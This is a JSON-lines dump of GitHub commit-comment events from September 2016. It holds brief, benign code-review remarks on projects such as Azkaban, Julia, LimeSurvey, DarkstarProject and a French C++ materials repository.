{"id":"4540597000","type":"CommitCommentEvent","actor":{"login":"ahashibon"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18964450,"position":286,"line":153,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-09T15:06:34Z","updated_at":"2016-09-09T15:06:34Z","body":"see above comment. "}},"created_at":"2016-09-09T15:06:34Z"}
{"id":"4540599225","type":"CommitCommentEvent","actor":{"login":"HappyRay"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18964454,"position":36,"line":120,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-09T15:06:57Z","updated_at":"2016-09-09T15:06:57Z","body":"Could you explain what happens when an exception is thrown here? Maybe include an example of what users would see? "}},"created_at":"2016-09-09T15:06:57Z"}
{"id":"4540600531","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18964458,"position":74,"line":81,"path":"deps/fftw.mk","commit_id":"72402bad84e781ef6f66bab3e1e487c999718a6d","created_at":"2016-09-09T15:07:12Z","updated_at":"2016-09-09T15:07:12Z","body":"ah, too much copy-paste. `%` should be `$*` in the body of the makefile script"}},"created_at":"2016-09-09T15:07:12Z"}
{"id":"4540601746","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18964465,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:07:23Z","updated_at":"2016-09-09T15:07:23Z","body":"Update name=\"lang\" to name=\"langchanger\" break esxisting system.\r\n\r\nIf you put {LANGUAGECHANGER} inside welcome.pstpl : it don't work.\r\n\r\nAny reason to update this ?"}},"created_at":"2016-09-09T15:07:23Z"}
{"id":"4540602229","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-ewilliamswtn"},"payload":{"comment":{"id":18964469,"position":23,"line":23,"path":"quiz.js","commit_id":"fbecfecd8852b93361bd9177ba7d0959a6d33b8e","created_at":"2016-09-09T15:07:28Z","updated_at":"2016-09-09T15:07:28Z","body":"Try converting to ES6. Vars will become let"}},"created_at":"2016-09-09T15:07:28Z"}
{"id":"4540604758","type":"CommitCommentEvent","actor":{"login":"ahashibon"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18964473,"position":309,"line":176,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-09T15:07:55Z","updated_at":"2016-09-09T15:07:55Z","body":"correct!"}},"created_at":"2016-09-09T15:07:55Z"}
{"id":"4540608460","type":"CommitCommentEvent","actor":{"login":"ahashibon"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18964480,"position":318,"line":185,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-09T15:08:35Z","updated_at":"2016-09-09T15:08:35Z","body":"please check add_MD branch of simphony_metadata"}},"created_at":"2016-09-09T15:08:35Z"}
{"id":"4540612794","type":"CommitCommentEvent","actor":{"login":"Kevin-Wei"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":18964493,"position":null,"line":null,"path":null,"commit_id":"8256c87faddbfbc5bfd73c3ffd8e5dd209b6d7d8","created_at":"2016-09-09T15:09:23Z","updated_at":"2016-09-09T15:09:23Z","body":"👍 commit msg 👍 "}},"created_at":"2016-09-09T15:09:23Z"}
{"id":"4540621326","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18964506,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T15:10:50Z","updated_at":"2016-09-09T15:10:50Z","body":"Well, yes, if they have a 32-bit data type, it's more efficient to use that."}},"created_at":"2016-09-09T15:10:50Z"}
{"id":"4540621391","type":"CommitCommentEvent","actor":{"login":"lukeIam"},"repo":{"name":"lukeIam/GCComment"},"payload":{"comment":{"id":18964507,"position":null,"line":null,"path":null,"commit_id":"119f154a58cf6b8e0fea07a184769e1f6e8b8f4d","created_at":"2016-09-09T15:10:51Z","updated_at":"2016-09-09T15:10:51Z","body":"@Cappa-d do you might want to test this change too? : \r\n \r\nFirefox: https://raw.githubusercontent.com/lukeIam/GCComment/gccOnPMO/src/gccomment.user.js\r\nChrome: https://raw.githubusercontent.com/lukeIam/GCComment/gccOnPMO/dist/GCComment.zip\r\nOpera: https://raw.githubusercontent.com/lukeIam/GCComment/gccOnPMO/dist/GCComment.crx"}},"created_at":"2016-09-09T15:10:51Z"}
{"id":"4540624107","type":"CommitCommentEvent","actor":{"login":"Bubadabado"},"repo":{"name":"Bubadabado/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":18964513,"position":null,"line":null,"path":null,"commit_id":"cb195b0a7211c42e6d770ff0a74817515a4e9321","created_at":"2016-09-09T15:11:18Z","updated_at":"2016-09-09T15:11:18Z","body":"The problem messed up on my cpu, but ill try and re download it for better results. Ill change it back to full last names."}},"created_at":"2016-09-09T15:11:18Z"}
{"id":"4540624121","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18964512,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-09T15:11:18Z","updated_at":"2016-09-09T15:11:18Z","body":"I'll check this early next week. I'd prefer 1.7 to be backwards compatible."}},"created_at":"2016-09-09T15:11:18Z"}
{"id":"4540626176","type":"CommitCommentEvent","actor":{"login":"Bubadabado"},"repo":{"name":"Bubadabado/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":18964516,"position":null,"line":null,"path":null,"commit_id":"cb195b0a7211c42e6d770ff0a74817515a4e9321","created_at":"2016-09-09T15:11:36Z","updated_at":"2016-09-09T15:11:36Z","body":"oopsy"}},"created_at":"2016-09-09T15:11:36Z"}
{"id":"4540628905","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18964518,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:12:05Z","updated_at":"2016-09-09T15:12:05Z","body":"I'd say double id between the language switch from menu and the one that user can include in surveylist/survey "}},"created_at":"2016-09-09T15:12:05Z"}
{"id":"4540633414","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18964532,"position":null,"line":null,"path":null,"commit_id":"7b29d024b9a3f7ada3fbb36c5d8b68082fc7a975","created_at":"2016-09-09T15:12:53Z","updated_at":"2016-09-09T15:12:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OHE9sbcIS-6DJutvbm5-Ew"}},"created_at":"2016-09-09T15:12:53Z"}
{"id":"4540637520","type":"CommitCommentEvent","actor":{"login":"dianaramirezfigueroa"},"repo":{"name":"dianaramirezfigueroa/VETMAP"},"payload":{"comment":{"id":18964542,"position":null,"line":null,"path":null,"commit_id":"6a6e55708cf28370ba4d21bb01ecc5e971321ea2","created_at":"2016-09-09T15:13:37Z","updated_at":"2016-09-09T15:13:37Z","body":"En esta imagen podemos evidenciar la nueva versión del diagrama de distribución con las correcciones indicadas y actualizadas\r\n![diagrama de distribucion](https://cloud.githubusercontent.com/assets/20650800/18392077/02ce0708-7676-11e6-8b39-0a285ae95e6f.jpg)\r\n"}},"created_at":"2016-09-09T15:13:37Z"}
{"id":"4540638065","type":"CommitCommentEvent","actor":{"login":"shamis"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964543,"position":39,"line":41,"path":"src/dderl_saml_handler.erl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T15:13:43Z","updated_at":"2016-09-09T15:13:43Z","body":"error messages from imem auth for example : Account name conflict error"}},"created_at":"2016-09-09T15:13:43Z"}
{"id":"4540638068","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18964544,"position":null,"line":null,"path":null,"commit_id":"b90942d549027c5452b6e9eb1f3ead3ebec45d87","created_at":"2016-09-09T15:13:43Z","updated_at":"2016-09-09T15:13:43Z","body":"W00t!"}},"created_at":"2016-09-09T15:13:43Z"}
{"id":"4540639530","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18964553,"position":null,"line":null,"path":null,"commit_id":"351112b245ece9224a6871a5d6b886eef1c320aa","created_at":"2016-09-09T15:13:58Z","updated_at":"2016-09-09T15:13:58Z","body":"fast-forwarding develop-2.2 to borshop-integration-1475-nem-handle-undefined-fsm-limit = 98785981"}},"created_at":"2016-09-09T15:13:58Z"}
{"id":"4540640840","type":"CommitCommentEvent","actor":{"login":"wolfreak99"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18964557,"position":null,"line":null,"path":null,"commit_id":"32a6722cdac7fe23235db73774f1ba2011e49e9a","created_at":"2016-09-09T15:14:12Z","updated_at":"2016-09-09T15:14:12Z","body":"Oh..... this looks good. this looks real good. Are we getting close to what I think we're getting close to?"}},"created_at":"2016-09-09T15:14:12Z"}
{"id":"4540645007","type":"CommitCommentEvent","actor":{"login":"Thanood"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":18964567,"position":null,"line":null,"path":null,"commit_id":"277f7cfa174e74cd4f3839df7e269ba0daee5047","created_at":"2016-09-09T15:14:54Z","updated_at":"2016-09-09T15:14:54Z","body":"What the ...?\r\nDiff says Components but the file is still at Project Status?\r\n"}},"created_at":"2016-09-09T15:14:54Z"}
{"id":"4540645463","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18964568,"position":null,"line":null,"path":null,"commit_id":"6eafd4f2708def19dfc1ba0c1d2c8a44d9e9561f","created_at":"2016-09-09T15:14:59Z","updated_at":"2016-09-09T15:14:59Z","body":"I think somewhere it needs to be defined for 7 source.. still not sure "}},"created_at":"2016-09-09T15:14:59Z"}
{"id":"4540648495","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-tshavor"},"payload":{"comment":{"id":18964572,"position":22,"line":22,"path":"Gruntfile.js","commit_id":"fc285154aaacf3bb17107ce4a9be59da724c4541","created_at":"2016-09-09T15:15:30Z","updated_at":"2016-09-09T15:15:30Z","body":"Your Gruntfile needs to point to the location of your files. You don't have a js folder, you have a javascripts folder. With your current file/folder structure, this line should read: files: ['javascripts/**/*.js']"}},"created_at":"2016-09-09T15:15:30Z"}
{"id":"4540650243","type":"CommitCommentEvent","actor":{"login":"jottinger"},"repo":{"name":"jottinger/ml"},"payload":{"comment":{"id":18964576,"position":null,"line":null,"path":null,"commit_id":"e5765b60d89f6013fecabd20435e7550558c2ca6","created_at":"2016-09-09T15:15:49Z","updated_at":"2016-09-09T15:15:49Z","body":"Can't you retrieve objects in order from a queue?"}},"created_at":"2016-09-09T15:15:49Z"}
{"id":"4540651937","type":"CommitCommentEvent","actor":{"login":"codeape2"},"repo":{"name":"codeape2/cppcpa"},"payload":{"comment":{"id":18964582,"position":69,"line":675,"path":"AMQP-mal-sender.xml","commit_id":"b238b3c9f65d6d85c2910e16262f998cd7863441","created_at":"2016-09-09T15:16:09Z","updated_at":"2016-09-09T15:16:09Z","body":"Checking D:\\dev\\misc\\cpp_cpa\\AMQP-mal-sender.xml\r\nfile:///D:/dev/misc/cpp_cpa/AMQP-mal-sender.xml (675:10): The element 'ServiceBinding' in namespace 'http://www.oasis-open.org/committees/ebxml-cppa/schema/cpp-cpa-2_0.xsd' has invalid child element 'ThisPartyActionBinding' in namespace 'http://www.oasis-open.org/committees/ebxml-cppa/schema/cpp-cpa-2_0.xsd'. List of possible elements expected: 'CanSend, CanReceive' in namespace 'http://www.oasis-open.org/committees/ebxml-cppa/schema/cpp-cpa-2_0.xsd'.\r\nERROR in XSD validation!\r\n"}},"created_at":"2016-09-09T15:16:09Z"}
{"id":"4540656506","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-tshavor"},"payload":{"comment":{"id":18964591,"position":29,"line":29,"path":"Gruntfile.js","commit_id":"fc285154aaacf3bb17107ce4a9be59da724c4541","created_at":"2016-09-09T15:16:55Z","updated_at":"2016-09-09T15:16:55Z","body":"I don't believe you are using handlebars for this project. Remove unnecessary info from the grunt file."}},"created_at":"2016-09-09T15:16:55Z"}
{"id":"4540657215","type":"CommitCommentEvent","actor":{"login":"maxtherabbit"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18964595,"position":26,"line":332,"path":"src/map/enmity_container.cpp","commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T15:17:04Z","updated_at":"2016-09-09T15:17:04Z","body":"which it should not"}},"created_at":"2016-09-09T15:17:04Z"}
{"id":"4540657309","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Khalymon"},"payload":{"comment":{"id":18964596,"position":6,"line":136,"path":"src/module02/Task1.java","commit_id":"f19ef05dbc6083e6128cae79bd9b1ad3e21ee2c0","created_at":"2016-09-09T15:17:05Z","updated_at":"2016-09-09T15:17:05Z","body":"Я хоть слово сказал по поводу этого? Зачем ты это изменение сюда внес?"}},"created_at":"2016-09-09T15:17:05Z"}
{"id":"4540657557","type":"CommitCommentEvent","actor":{"login":"codeape2"},"repo":{"name":"codeape2/cppcpa"},"payload":{"comment":{"id":18964598,"position":55,"line":661,"path":"AMQP-mal-sender.xml","commit_id":"b238b3c9f65d6d85c2910e16262f998cd7863441","created_at":"2016-09-09T15:17:08Z","updated_at":"2016-09-09T15:17:08Z","body":"The 'tns:ServiceBinding' start tag on line 661 position 8 does not match the end tag of 'tns:CanReceive'. Line 679, position 11"}},"created_at":"2016-09-09T15:17:08Z"}
{"id":"4540659727","type":"CommitCommentEvent","actor":{"login":"HappyRay"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18964604,"position":27,"line":111,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-09T15:17:30Z","updated_at":"2016-09-09T15:17:30Z","body":"Similar logic is in azkaban.webapp.servlet.ProjectManagerServlet#ajaxHandleUpload. That logic handles warning messages as well. Should this code handle warnings as well? \r\n\r\nDid you make sure the logic in both remain consistent?\r\n\r\n"}},"created_at":"2016-09-09T15:17:30Z"}
{"id":"4540661102","type":"CommitCommentEvent","actor":{"login":"atoomic"},"repo":{"name":"atoomic/Git-Wrapper"},"payload":{"comment":{"id":18964608,"position":5,"line":77,"path":"t/basic.t","commit_id":"39efb579d72c8eabf8f7ba45f95c927aa5b69168","created_at":"2016-09-09T15:17:46Z","updated_at":"2016-09-09T15:17:46Z","body":"the \\t is a problem with newest version of git"}},"created_at":"2016-09-09T15:17:46Z"}
{"id":"4540667318","type":"CommitCommentEvent","actor":{"login":"HappyRay"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18964615,"position":24,"line":108,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-09T15:18:51Z","updated_at":"2016-09-09T15:18:51Z","body":"Consider creating a function and add unit tests."}},"created_at":"2016-09-09T15:18:51Z"}
{"id":"4540669766","type":"CommitCommentEvent","actor":{"login":"HappyRay"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18964619,"position":23,"line":107,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-09T15:19:17Z","updated_at":"2016-09-09T15:19:17Z","body":"Can you think of a way to write an automated test for this fix?"}},"created_at":"2016-09-09T15:19:17Z"}
{"id":"4540671473","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-tshavor"},"payload":{"comment":{"id":18964622,"position":27,"line":27,"path":"Gruntfile.js","commit_id":"fc285154aaacf3bb17107ce4a9be59da724c4541","created_at":"2016-09-09T15:19:34Z","updated_at":"2016-09-09T15:19:34Z","body":"fix here too."}},"created_at":"2016-09-09T15:19:34Z"}
{"id":"4540673709","type":"CommitCommentEvent","actor":{"login":"nicpottier"},"repo":{"name":"FLOIP/flow-spec"},"payload":{"comment":{"id":18964628,"position":null,"line":null,"path":null,"commit_id":"fc91c6a764ec3d5d542bd303f29373667a1d432c","created_at":"2016-09-09T15:19:59Z","updated_at":"2016-09-09T15:19:59Z","body":"👍 "}},"created_at":"2016-09-09T15:19:59Z"}
{"id":"4540681395","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Khalymon"},"payload":{"comment":{"id":18964640,"position":55,"line":55,"path":"src/module02/Task1.java","commit_id":"5581b8475460a99969af27c868441db65da853bf","created_at":"2016-09-09T15:21:21Z","updated_at":"2016-09-09T15:21:21Z","body":"Не нужно явно расставлять скобки у операции < больше приоритет чем у &&, это как с *, / и +, -"}},"created_at":"2016-09-09T15:21:21Z"}
{"id":"4540681887","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Khalymon"},"payload":{"comment":{"id":18964641,"position":65,"line":65,"path":"src/module02/Task1.java","commit_id":"5581b8475460a99969af27c868441db65da853bf","created_at":"2016-09-09T15:21:26Z","updated_at":"2016-09-09T15:21:26Z","body":"Не нужно явно расставлять скобки у операции < больше приоритет чем у &&, это как с *, / и +, -"}},"created_at":"2016-09-09T15:21:26Z"}
{"id":"4540683091","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18964645,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T15:21:38Z","updated_at":"2016-09-09T15:21:38Z","body":"yeah, the main benefit I can see is computer software, eg. OS install discs where you really don't want to be trimming too much out of the names.\r\n\r\nbut there would be little reason to rename something like 'bjtwin' to 'bombjacktwin' because it wins you nothing other than extra letters to type.\r\n"}},"created_at":"2016-09-09T15:21:38Z"}
{"id":"4540687654","type":"CommitCommentEvent","actor":{"login":"takhlaq"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18964648,"position":26,"line":332,"path":"src/map/enmity_container.cpp","commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T15:22:26Z","updated_at":"2016-09-09T15:22:26Z","body":"eh it was doing that before this change but ya needs redoing"}},"created_at":"2016-09-09T15:22:26Z"}
{"id":"4540690085","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18964650,"position":26,"line":332,"path":"src/map/enmity_container.cpp","commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T15:22:52Z","updated_at":"2016-09-09T15:22:52Z","body":"I debated adding that particular in my comment, but I thought it was a\ngiven :p\n"}},"created_at":"2016-09-09T15:22:52Z"}
{"id":"4540693076","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18964658,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:23:23Z","updated_at":"2016-09-09T15:23:23Z","body":"but name !==id .....\r\n\r\n````\r\nCHtml::dropDownList('lang', $sSelected,$aListLang,array('class'=>$sClass,'data-targeturl'=>$sTargetURL,'id'=>somealeatorystring));\r\n````"}},"created_at":"2016-09-09T15:23:23Z"}
{"id":"4540694164","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18964661,"position":26,"line":332,"path":"src/map/enmity_container.cpp","commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T15:23:35Z","updated_at":"2016-09-09T15:23:35Z","body":"just remove the hipclvl in this functions and it'll be good"}},"created_at":"2016-09-09T15:23:35Z"}
{"id":"4540694487","type":"CommitCommentEvent","actor":{"login":"takhlaq"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18964662,"position":26,"line":332,"path":"src/map/enmity_container.cpp","commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T15:23:39Z","updated_at":"2016-09-09T15:23:39Z","body":"which it just occurred to me that was also my fault haha"}},"created_at":"2016-09-09T15:23:39Z"}
{"id":"4540697544","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITASAPI-v2.7"},"payload":{"comment":{"id":18964669,"position":null,"line":null,"path":null,"commit_id":"2f51aec5a100b0b5876f8bb50928c86ca00e30c0","created_at":"2016-09-09T15:24:14Z","updated_at":"2016-09-09T15:24:14Z","body":"__API Description file syntax error on line 3160__: base type 'MasterDataTradingEntity' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T15:24:14Z"}
{"id":"4540697904","type":"CommitCommentEvent","actor":{"login":"rasendubi"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18964670,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T15:24:17Z","updated_at":"2016-09-09T15:24:17Z","body":"lutshe prihodi pizditsa v voskresenie"}},"created_at":"2016-09-09T15:24:17Z"}
{"id":"4540704420","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18964678,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:25:25Z","updated_at":"2016-09-09T15:25:25Z","body":"If you want to change it: feel free to do it. "}},"created_at":"2016-09-09T15:25:25Z"}
{"id":"4540705095","type":"CommitCommentEvent","actor":{"login":"Soorya135"},"repo":{"name":"Soorya135/SDTEST"},"payload":{"comment":{"id":18964681,"position":null,"line":null,"path":null,"commit_id":"7f6f6b43d3c40fbd8516873eedc417746d9dddf6","created_at":"2016-09-09T15:25:31Z","updated_at":"2016-09-09T15:25:31Z","body":"This is sample repository using githhub"}},"created_at":"2016-09-09T15:25:31Z"}
{"id":"4540723788","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":18964735,"position":null,"line":null,"path":null,"commit_id":"60176ec0cc7b006216bbf25b3ded9c2e485403d2","created_at":"2016-09-09T15:28:44Z","updated_at":"2016-09-09T15:28:44Z","body":"@Grz3s which spell targets need to be fixed?\r\nWhat spells are you using here?"}},"created_at":"2016-09-09T15:28:44Z"}
{"id":"4540724367","type":"CommitCommentEvent","actor":{"login":"t-kashima"},"repo":{"name":"mokmoku/loveit-ios"},"payload":{"comment":{"id":18964736,"position":5,"line":23,"path":"loveit/ViewController.swift","commit_id":"c996a18b28c72b08fb5f85f505e29a644404d47c","created_at":"2016-09-09T15:28:51Z","updated_at":"2016-09-09T15:28:51Z","body":"ステータスバーを白色にする"}},"created_at":"2016-09-09T15:28:51Z"}
{"id":"4540727254","type":"CommitCommentEvent","actor":{"login":"adamkaplan"},"repo":{"name":"jprochazka/adsb-receiver"},"payload":{"comment":{"id":18964739,"position":null,"line":null,"path":null,"commit_id":"7fa44bd33107cc4a97f4437433e950936cd88c85","created_at":"2016-09-09T15:29:21Z","updated_at":"2016-09-09T15:29:21Z","body":"Hurray!"}},"created_at":"2016-09-09T15:29:21Z"}
{"id":"4540727779","type":"CommitCommentEvent","actor":{"login":"selivanov-d"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18964740,"position":2,"line":2,"path":"app/models/railway_station.rb","commit_id":"379e875263bdaab53eba6d5fb5f802732c4adaf3","created_at":"2016-09-09T15:29:26Z","updated_at":"2016-09-09T15:29:26Z","body":"Упустил, ага.\r\nПоправил."}},"created_at":"2016-09-09T15:29:26Z"}
{"id":"4540727951","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18964742,"position":null,"line":null,"path":null,"commit_id":"c0ace540fc47b71dabc4658a4f703016b05119e7","created_at":"2016-09-09T15:29:29Z","updated_at":"2016-09-09T15:29:29Z","body":"Are you trying to compete with me?"}},"created_at":"2016-09-09T15:29:29Z"}
{"id":"4540730883","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":18964750,"position":null,"line":null,"path":null,"commit_id":"9ad062499da2e91dfc7b8d05855ea099bbacdf7e","created_at":"2016-09-09T15:29:57Z","updated_at":"2016-09-09T15:29:57Z","body":"Yes I saw that and it was fixed long ago: https://github.com/classicdb/database/commit/977d99384701d69878d1c057218c03f4371b0090 :wink:"}},"created_at":"2016-09-09T15:29:57Z"}
{"id":"4540734079","type":"CommitCommentEvent","actor":{"login":"jdwall"},"repo":{"name":"jprochazka/adsb-receiver"},"payload":{"comment":{"id":18964761,"position":null,"line":null,"path":null,"commit_id":"7fa44bd33107cc4a97f4437433e950936cd88c85","created_at":"2016-09-09T15:30:30Z","updated_at":"2016-09-09T15:30:30Z","body":"Woohoo! I am going to give it a shot to see if this fixes bug issue #218. Will report back with my findings! "}},"created_at":"2016-09-09T15:30:30Z"}
{"id":"4540736869","type":"CommitCommentEvent","actor":{"login":"rvimont"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18964767,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-09T15:30:55Z","updated_at":"2016-09-09T15:30:55Z","body":"> Mais effectivement, la [TS Hexadecimal floating literals for C++](http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0245r1.html) est ambiguë a propos de `v = 0x2.8f` et `v = 2.5f`.\r\n\r\nEffectivement:\r\n> hexadecimal-floating-literal:\r\n>   hexadecimal-prefix hexadecimal-fractional-constant binary-exponent-part floating-suffixopt\r\n\r\nJe ne vois pas comment avoir un floating-suffix si on est en hexa (le `f` étant toujours interprété comme un digit).\r\n\r\n> Cela mérite une question StackOverflow (ou une issue sur le repo Git du comité...)\r\n> Qu'en penses-tu ?\r\n\r\nOui, ça m'intéresserait d'en savoir plus. Tu t'en occupes? :smile: \r\n\r\nAu passage:\r\n> std::cout.precision(99);\r\n\r\nÇa ne sert à rien:\r\n - pour un `float` tu as 24*ln(2)/ln(10) ~= 7 chiffres significatifs;\r\n - pour un `double`, tu as 53*ln(2)/ln(10) ~= 16 chiffres significatifs.\r\n\r\nTu affiches plus de précision que n'en stocke la variable, ce qui t'affiche du garbage:\r\n\r\n```cpp\r\n#include <iostream>\r\nint main() {\r\n    std::cout.precision(30);\r\n    std::cout << 0.1 << std::endl;\r\n    return 0;\r\n}\r\n```\r\n\r\nRésultat:\r\n```\r\n0.100000000000000005551115123126\r\n```"}},"created_at":"2016-09-09T15:30:55Z"}
{"id":"4540742222","type":"CommitCommentEvent","actor":{"login":"rom1v"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18964777,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-09T15:31:51Z","updated_at":"2016-09-09T15:31:51Z","body":"> Mais effectivement, la [TS Hexadecimal floating literals for C++](http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0245r1.html) est ambiguë a propos de `v = 0x2.8f` et `v = 2.5f`.\r\n\r\nEffectivement:\r\n> hexadecimal-floating-literal:\r\n>   hexadecimal-prefix hexadecimal-fractional-constant binary-exponent-part floating-suffixopt\r\n\r\nJe ne vois pas comment avoir un _floating-suffix_ si on est en hexa (le `f` étant toujours interprété comme un digit).\r\n\r\n> Cela mérite une question StackOverflow (ou une issue sur le repo Git du comité...)\r\n> Qu'en penses-tu ?\r\n\r\nOui, ça m'intéresserait d'en savoir plus. Tu t'en occupes? :smile: \r\n\r\nAu passage:\r\n> std::cout.precision(99);\r\n\r\nÇa ne sert à rien:\r\n - pour un `float` tu as 24*ln(2)/ln(10) ~= 7 chiffres significatifs;\r\n - pour un `double`, tu as 53*ln(2)/ln(10) ~= 16 chiffres significatifs.\r\n\r\nTu affiches plus de précision que n'en stocke la variable, ce qui t'affiche du garbage:\r\n\r\n```cpp\r\n#include <iostream>\r\nint main() {\r\n    std::cout.precision(30);\r\n    std::cout << 0.1 << std::endl;\r\n    return 0;\r\n}\r\n```\r\n\r\nRésultat:\r\n```\r\n0.100000000000000005551115123126\r\n```"}},"created_at":"2016-09-09T15:31:51Z"}
